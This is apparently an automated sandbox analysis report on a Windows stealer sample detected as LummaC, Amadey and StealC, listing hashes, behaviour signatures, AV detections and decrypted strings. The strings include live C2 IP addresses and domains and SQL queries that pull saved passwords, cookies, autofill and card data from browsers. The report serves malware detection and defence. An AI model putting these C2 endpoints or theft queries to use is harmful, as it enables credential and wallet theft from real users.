Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546479
MD5: 04e39d3bf9bd2b3cdf9809124fc8e25c
SHA1: 923ce593cff9db08cf2990b7513a17875d0dd903
SHA256: f370ae6a49126a86d98f7f1d3ce1882f660e63873b8152f65feb69367ca843a2
Tags: exeuser-Bitsight

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000020.00000002.2947624968.00000000004D1000.00000040.00000001.01000000.00000019.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 48.2.num.exe.2a0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: efe6fe4127.exe.5280.12.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "navygenerayk.store", "fadehairucw.store", "presticitpo.store", "thumbystriw.store", "necklacedmny.store", "scriptyprefej.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe ReversingLabs: Detection: 95%
Source: file.exe ReversingLabs: Detection: 39%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9XHYSBI0DT1C8ABJDSO.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 30
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 11
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 20
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 24
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetProcAddress
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: LoadLibraryA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: lstrcatA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: OpenEventA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateEventA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CloseHandle
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Sleep
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VirtualFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetSystemInfo
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VirtualAlloc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HeapAlloc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetComputerNameA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: lstrcpyA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetProcessHeap
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetCurrentProcess
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: lstrlenA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ExitProcess
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetSystemTime
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: advapi32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: gdi32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: user32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: crypt32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ntdll.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetUserNameA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateDCA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetDeviceCaps
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ReleaseDC
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sscanf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VMwareVMware
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HAL9TH
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: JohnDoe
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DISPLAY
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: http://185.215.113.206
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: bksvnsj
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: /746f34465cf17784/
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: tale
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetFileAttributesA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalLock
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HeapFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetFileSize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalSize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: IsWow64Process
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Process32Next
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetLocalTime
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FreeLibrary
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetVolumeInformationA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Process32First
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetLocaleInfoA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetModuleFileNameA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DeleteFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FindNextFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: LocalFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FindClose
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: LocalAlloc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetFileSizeEx
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ReadFile
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SetFilePointer
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: WriteFile
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FindFirstFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CopyFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VirtualProtect
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetLastError
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: lstrcpynA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: MultiByteToWideChar
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: WideCharToMultiByte
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalAlloc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: OpenProcess
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: TerminateProcess
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetCurrentProcessId
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: gdiplus.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ole32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: bcrypt.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: wininet.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: shlwapi.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: shell32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: psapi.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: rstrtmgr.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SelectObject
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BitBlt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DeleteObject
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateCompatibleDC
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipGetImageEncoders
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdiplusStartup
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdiplusShutdown
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipSaveImageToStream
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipDisposeImage
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetHGlobalFromStream
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CoUninitialize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CoInitialize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CoCreateInstance
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptDecrypt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptSetProperty
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptDestroyKey
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetWindowRect
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetDesktopWindow
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetDC
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CloseWindow
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: wsprintfA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CharToOemW
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: wsprintfW
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegQueryValueExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegEnumKeyExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegOpenKeyExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegCloseKey
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegEnumValueA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CryptBinaryToStringA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CryptUnprotectData
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SHGetFolderPathA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ShellExecuteExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetOpenUrlA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetConnectA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetCloseHandle
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetOpenA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HttpSendRequestA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HttpOpenRequestA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetReadFile
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetCrackUrlA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: StrCmpCA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: StrStrA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: StrCmpCW
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PathMatchSpecA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetModuleFileNameExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RmStartSession
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RmRegisterResources
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RmGetList
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RmEndSession
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_open
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_step
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_column_text
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_finalize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_close
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_column_bytes
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_column_blob
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: encrypted_key
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PATH
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: NSS_Init
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: NSS_Shutdown
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PK11_FreeSlot
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PK11_Authenticate
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: C:\ProgramData\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: browser:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: profile:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: url:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: login:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: password:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Opera
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: OperaGX
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Network
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: cookies
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: .txt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: TRUE
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FALSE
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: autofill
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: history
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: cc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: name:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: month:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: year:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: card:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Cookies
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Login Data
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Web Data
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: History
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: logins.json
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: formSubmitURL
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: usernameField
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: encryptedUsername
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: encryptedPassword
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: guid
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: cookies.sqlite
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: formhistory.sqlite
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: places.sqlite
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: plugins
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Local Extension Settings
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Sync Extension Settings
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: IndexedDB
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Opera Stable
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Opera GX Stable
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CURRENT
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: chrome-extension_
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Local State
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: profiles.ini
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: chrome
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: opera
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: firefox
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: wallets
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %08lX%04lX%lu
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ProductName
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: x32
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: x64
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ProcessorNameString
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DisplayName
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DisplayVersion
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Network Info:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - IP: IP?
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Country: ISO?
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: System Summary:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - HWID:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - OS:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Architecture:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - UserName:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Computer Name:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Local Time:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - UTC:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Language:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Keyboards:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Laptop:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Running Path:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - CPU:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Threads:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Cores:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - RAM:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Display Resolution:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - GPU:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: User Agents:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Installed Apps:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: All Users:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Current User:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Process List:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: system_info.txt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: freebl3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: mozglue.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: msvcp140.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: nss3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: softokn3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: vcruntime140.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Temp\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: .exe
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: runas
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: open
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: /c start
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %DESKTOP%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %APPDATA%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %USERPROFILE%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %DOCUMENTS%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %PROGRAMFILES%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %RECENT%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: *.lnk
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: files
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \discord\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Local Storage\leveldb
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Telegram Desktop\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: key_datas
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: map*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: A7FDF864FBC10B77*
